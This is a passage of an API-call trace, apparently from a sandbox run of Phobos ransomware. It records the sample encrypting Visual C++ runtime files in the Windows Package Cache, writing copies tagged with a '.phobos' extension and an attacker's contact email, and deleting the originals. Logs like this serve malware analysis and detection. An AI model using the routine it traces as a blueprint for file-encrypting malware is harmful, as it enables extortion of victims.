dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0181.842] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0181.842] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0181.842] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x25000, lpOverlapped=0x0) returned 1 [0181.895] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x25010, dwBufLen=0x25010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x25010) returned 1 [0181.896] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x25010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x25010, lpOverlapped=0x0) returned 1 [0181.899] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0181.899] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0181.899] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0181.899] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.899] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0181.899] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.899] CloseHandle (hObject=0x17c) returned 1 [0181.899] CloseHandle (hObject=0x178) returned 1 [0181.899] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 1 [0181.901] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0181.901] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0181.903] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=821681) returned 1 [0181.904] CloseHandle (hObject=0x178) returned 1 [0181.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0181.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.904] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0181.904] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0181.904] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0181.904] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0181.988] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0181.988] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0181.988] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xc89b1, lpOverlapped=0x0) returned 1 [0182.118] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xc89c0, dwBufLen=0xc89c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xc89c0) returned 1 [0182.125] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc89c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xc89c0, lpOverlapped=0x0) returned 1 [0182.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0182.148] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.148] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0182.148] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.148] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0182.148] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.149] CloseHandle (hObject=0x178) returned 1 [0182.149] CloseHandle (hObject=0x17c) returned 1 [0182.150] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 1 [0182.157] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0182.157] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0182.158] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=151552) returned 1 [0182.158] CloseHandle (hObject=0x17c) returned 1 [0182.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0182.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.158] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0182.158] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0182.158] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0182.158] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0182.159] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.159] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x25000, lpOverlapped=0x0) returned 1 [0182.210] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x25010, dwBufLen=0x25010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x25010) returned 1 [0182.211] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x25010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x25010, lpOverlapped=0x0) returned 1 [0182.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0182.214] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.214] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0182.214] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.214] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0182.214] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.214] CloseHandle (hObject=0x17c) returned 1 [0182.214] CloseHandle (hObject=0x178) returned 1 [0182.214] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 1 [0182.217] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0182.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.217] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=654) returned 1 [0182.217] CloseHandle (hObject=0x178) returned 1 [0182.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm")) returned 0x20 [0182.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0182.218] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0182.218] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0182.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0182.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ae8) returned 1 [0182.290] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.290] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x28e, lpOverlapped=0x0) returned 1 [0182.291] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x290, dwBufLen=0x290 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x290) returned 1 [0182.291] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x290, lpOverlapped=0x0) returned 1 [0182.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0182.292] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.292] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0182.292] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.292] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0182.292] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.292] CloseHandle (hObject=0x178) returned 1 [0182.292] CloseHandle (hObject=0x134) returned 1 [0182.292] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm")) returned 1 [0182.293] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0182.293] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0182.294] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=809765) returned 1 [0182.294] CloseHandle (hObject=0x134) returned 1 [0182.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0182.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0182.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0182.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0182.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0182.431] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0182.432] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.432] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xc5b25, lpOverlapped=0x0) returned 1 [0182.486] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xc5b30, dwBufLen=0xc5b30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xc5b30) returned 1 [0182.492] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc5b30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xc5b30, lpOverlapped=0x0) returned 1 [0182.674] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0182.674] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0182.674] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0182.674] CryptDestroyKey (hKey=0xa327e8) returned 1 [0182.674] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0182.674] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.674] CloseHandle (hObject=0x134) returned 1 [0182.674] CloseHandle (hObject=0x130) returned 1 [0182.674] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 1 [0182.681] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0182.681] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0182.681] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5881317) returned 1 [0182.681] CloseHandle (hObject=0x130) returned 1 [0182.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0182.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 